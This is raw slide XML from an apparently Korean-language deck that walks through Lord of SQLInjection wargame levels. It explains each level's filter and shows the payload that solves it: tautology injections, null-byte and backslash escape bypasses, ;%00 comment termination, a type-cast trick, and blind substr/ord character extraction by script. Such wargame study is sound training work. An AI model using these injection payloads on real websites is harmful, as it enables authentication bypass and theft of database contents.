              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>를 입력해도 통과할 수 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87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CF96A7-5FD4-488A-92E7-ABE2D7E82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16"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="937327" y="556618"/>
            <a:ext cx="10317345" cy="2872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C5E57-389E-43BC-A9B0-8B2275FC1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" r="338" b="58116"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="937326" y="3429000"/>
            <a:ext cx="10317345" cy="28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73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Assassin_zombie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2555292-3C12-4354-861C-533CCD26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0" y="-7157"/>
            <a:ext cx="117214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//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not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attack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another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table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database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!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 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＇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＇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＂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32829-5CA5-42E6-84DB-496BD00B7FB8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="298186" y="3686162"/>
            <a:ext cx="11595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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>서버의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" err="1"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>에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lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>라는</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>쿼리문</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>질의</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>을 전송</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
          <a:p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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>질의에 대한 응답을 열의 형태로</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>result</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>라는 배열에 저장하고 한 번 더 선언하면 그 다음 행을 받아오는 함수</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>한 번만 선언한걸로 봐서는 첫번째 행에 우리가 찾는 행이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lang="ko-KR" altLang="en-US" err="1">
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>에</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="0000BB"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>저장</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
          <a:p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gremlin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//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lang="ko-KR" altLang="en-US" err="1">
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>의</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="0000BB"/>
                </a:solidFill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칼럼값을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잘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가져왔다면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7FE8CD-EA10-4E2C-B227-9819C8760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79" y="2682522"/>
            <a:ext cx="3801259" cy="333673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58CC4A-9AF6-4E15-8BAD-55B7ADD2F822}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="87085" y="6195605"/>
            <a:ext cx="12017828" cy="48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https://los.eagle-jump.org/gremlin_b~~1.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400"/>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=' or 'a' = '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" err="1"/>
              <a:t>&amp;pw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>' or 'a' = 'a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59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4A8D2-15AD-4C84-979D-3C57EFF5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" y="2377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prob_zombie_assassin where id=''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70FF5-79B9-4A6C-8CC6-879F0C27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" y="86548"/>
            <a:ext cx="1145698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'/\\\|prob|_|\.|\(\)/i'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'/\\\|prob|_|\.|\(\)/i'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ereg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ereg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prob_zombie_assassin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"zombie_assassin"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이번에도 싱글쿼터를 필터링하는데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preg_match()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안 쓰고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ereg()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썻다는 것이 힌트라고 생각했다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ereg()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>는 문자열 끝까지 검사하는데 이 때 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문자열끝을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NULL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문자로 판단</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>하므로 임의적으로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>NULL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>문자를 넣어서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문장의 끝을 속인 후 참값을 반환받으면 성공이다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https://los.eagle-jump.org/zombie_assassin_1~a.php?id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=%00a'='a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&amp;pw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=%00a'=‘a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-&gt; query : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1"/>
              <a:t>select id from prob_zombie_assassin where id=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'a'='a'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1"/>
              <a:t> and pw='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a'='a'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4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BD34-77F0-41E6-B988-234766465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Succubus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FE6E2-E63C-4CDF-B682-BD27C184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37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913E5D-792D-470E-9CC0-DDCE2BD7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prob_succubus where id=''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FB07D-B421-4E6B-A20F-68EEAE521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132"/>
            <a:ext cx="926086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prob_succubus where id='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"succubus"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Assassin_zombie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>와 다른점은 이번엔 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>preg_match</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>를 써서 싱글쿼터를 우회하였다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또한 이번엔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필터링 하지 않는다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이 힌트를 이용한다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먼저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고정되어있는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닫는쿼터를 문자열처리하고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 새로운 조건을 만든다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https://los.eagle-jump.org/succubus_8~f.php?id=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\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&amp;pw= or id="a"="a"--%20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query : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1"/>
              <a:t>select id from prob_succubus where id='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\' and pw=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1"/>
              <a:t>' or id="a"="a"-- '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41A1-4D76-4141-8879-21B4288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Nightmare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2B57F-0EB2-42E9-AE5B-74937A1C2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5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08919F-3B49-43B7-8C6A-E3272C50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" y="102717"/>
            <a:ext cx="7816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prob_nightmare where pw=('') and id!='admin'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97EED6-52D1-4527-B124-FEA49343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" y="148884"/>
            <a:ext cx="11800115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'/prob|_|\.|\(\)|#|-/i'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strlen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6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prob_nightmare where pw=('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') and id!='admin'"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"nightmare"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주석 문자인 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>과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ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>이 모두 필터링 되어있어서 새로운 주석방법인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;%00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>을 사용한다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mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>은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ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>으로 명령의 끝을 처리를 하고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ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>이후에 이어지는 명령은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>%00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>처리를 앞에 해줌으로써 문장이 끝난 것 처럼 해준다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정확한 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>자리의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를 맞추려해도 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34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pw=(‘%’)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>쓰려면 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>like</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>를 써야하지만 문자열이 제한되있으니 하지 못 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blind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sql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injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>도 하지 못 하고 조작을 하기 위해선 문자열 처리를 해주는 싱글쿼터를 없애줘야하니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우선 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>‘)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>으로 쿼터를 닫아주고 남아있는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>‘)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>를 주석처리하기 위해 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>;%00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>을 써주면 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글자가 남는다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. pw=(‘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’);%00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0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여기서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>을 넣어봤는데 성공하였다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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>pw=(‘’)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>가 거짓이라 거짓을 나타나는 숫자</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>’0’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>과 비교해서 둘 다 거짓이니 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>TRUE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>인 줄 알았지만 그게 아니였고 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  <a:hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>오토 타입 캐스트</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>라는 기능이 있었다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07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D842-9C45-4EDC-ABDC-F814363C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오토 타입 캐스트</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>(Automatic type cast)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8EBFB-8FA8-48CD-94EB-8ED389AE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83" y="1690688"/>
            <a:ext cx="12085320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서로 다른 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000"/>
              <a:t>개의 타입을 비교하면 같은 타입으로 만든 후 비교한다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pw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000"/>
              <a:t>칼럼은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000"/>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000"/>
              <a:t>나 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000"/>
              <a:t>varchar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000"/>
              <a:t>타입으로 되어있을거고</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000"/>
              <a:t>, pw=(‘’)=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/>
              <a:t>할때 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/>
              <a:t>은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000"/>
              <a:t>형이다</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000"/>
              <a:t>은 이 때 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000"/>
              <a:t>pw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000"/>
              <a:t>칼럼의 형태를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000"/>
              <a:t>로 생각하고 비교를 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만약 이때 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000"/>
              <a:t>pw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000"/>
              <a:t>칼럼의 값이 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000"/>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000"/>
              <a:t>라면 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000"/>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000"/>
              <a:t>으로 판단한다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(‘’)=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000"/>
              <a:t> 이 참이되고 그러면 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000"/>
              <a:t>pw=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000"/>
              <a:t>참 이므로 모든 정보가 출력된다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84802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FA5D-4C75-4BA2-AE27-8FA8B83F9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Xavis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F6C06-5F69-4966-9C55-168CB4BD0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62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65A3D3-0029-4156-AF81-7D4E2615D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" y="174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prob_xavis where id='admin' and pw=''or 1=1 and substr(pw,1,1)='a'--'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7894C-CBDE-4F19-BA05-5195F0DA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7" y="197345"/>
            <a:ext cx="1177784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'/regex|like/i'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prob_xavis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prob_xavis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"xavis"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regex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>는 모두 정규식을 사용해 문자열을 검색해주는 기능이다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우선 문제에서 정규식을 쓰지 못 하게 했기 때문에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substr(pw,1,1)=‘a’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처럼 한 문자씩 다 대입을 해야한다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확인해보면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길이는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나왔다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파이썬으로 대입을 해 주었더니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가 키보드의 어떤 글자로도 시작하지 않았다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확장된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코드인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코드를 대입해보기로 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ASCII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0~127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ASSI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128~255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번의 코드를 가지고 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2AB3C58-B3A7-462B-8CCE-2EA10CB2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1" y="1980749"/>
            <a:ext cx="837921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"https://los.eagle-jump.org/xavis_f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e.php?pw=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1=1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",1))="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"PHPSESSID=vihns63h0of9tdk4u0bpe76pv5"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A109A-1E84-4045-A41E-06C0774C71E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="78377" y="226423"/>
            <a:ext cx="1166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0~127</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>번까지의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>ASCII</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>코드 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>ascii()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>함수를 사용하지만 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ANSI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>코드는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ord()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>를 사용해야한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>ord()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>함수를 사용범위는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>ASCII()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>함수를 포함한 멀티바이트도 지원한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>ord(substr(pw,1,1))=128 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>부터 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>ord(substr(pw,40,1))=255</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>까지 다 찾아봤는데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10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>글자 이후로는 찾지 못하였다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en-US" altLang="ko-KR"/>
              <a:t> LENGTH()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>함수는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>byte</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>단위니깐 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>의 한 글자당 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4byte</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>를 할당하고 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>한 글자가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>4byte</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>라는건 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>pw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>의 값이 유니코드인 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>UTF-8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>로 인코딩된 후 저장이 되어있다고 생각을 해서</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>인자값을 유니코드로 출력해주는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>unichr()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
